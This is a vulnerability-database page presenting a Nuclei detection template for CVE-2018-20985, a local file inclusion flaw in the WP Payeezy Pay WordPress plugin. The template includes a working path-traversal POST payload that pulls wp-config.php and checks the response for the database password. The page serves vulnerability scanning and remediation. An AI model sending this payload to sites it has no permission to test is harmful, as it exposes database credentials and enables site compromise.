Vulners
Lucene search
WordPress Payeezy Pay <=2.97 - Local File Inclusion
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | WordPress wp-payeezy-pay plugin input validation error vulnerability | 28 Aug 201900:00 | – | cnvd |
 | CVE-2018-20985 | 22 Aug 201913:34 | – | cve |
 | CVE-2018-20985 | 22 Aug 201913:34 | – | cvelist |
 | CVE-2018-20985 | 22 Aug 201914:15 | – | nvd |
 | Design/Logic Flaw | 22 Aug 201914:15 | – | prion |
 | CVE-2018-20985 | 22 May 202505:09 | – | redhatcve |
 | WP Payeezy Pay < 2.98 - Local File Inclusion | 7 Dec 201800:00 | – | wpvulndb |
id: CVE-2018-20985
info:
name: WordPress Payeezy Pay <=2.97 - Local File Inclusion
author: daffainfo
severity: critical
description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
impact: |
The vulnerability allows an attacker to include local files and execute arbitrary code on the server.
remediation: |
Update to the latest version of WordPress Payeezy Pay plugin.
reference:
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
- https://wordpress.org/plugins/wp-payeezy-pay/#developers
- https://nvd.nist.gov/vuln/detail/CVE-2018-20985
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-20985
cwe-id: CWE-20
epss-score: 0.42918
epss-percentile: 0.97579
cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: payeezy
product: wp_payeezy_pay
framework: wordpress
tags: cve,cve2018,wordpress,lfi,plugin,payeezy,vuln
http:
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"
body: "x_login=../../../wp-config"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "The base configuration for WordPress"
- "define( 'DB_NAME',"
- "define( 'DB_PASSWORD',"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100c9c4e64b50196e711443e3bec223f9a466b68247cf506a85f170aef55a9a03e9022100952c663c676c7d9d425ed5475784e2cfa5bec7c720b818ed40a4f6909fce095e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8.4High risk
Vulners AI Score8.4
CVSS 27.5
CVSS 39.8
EPSS0.42918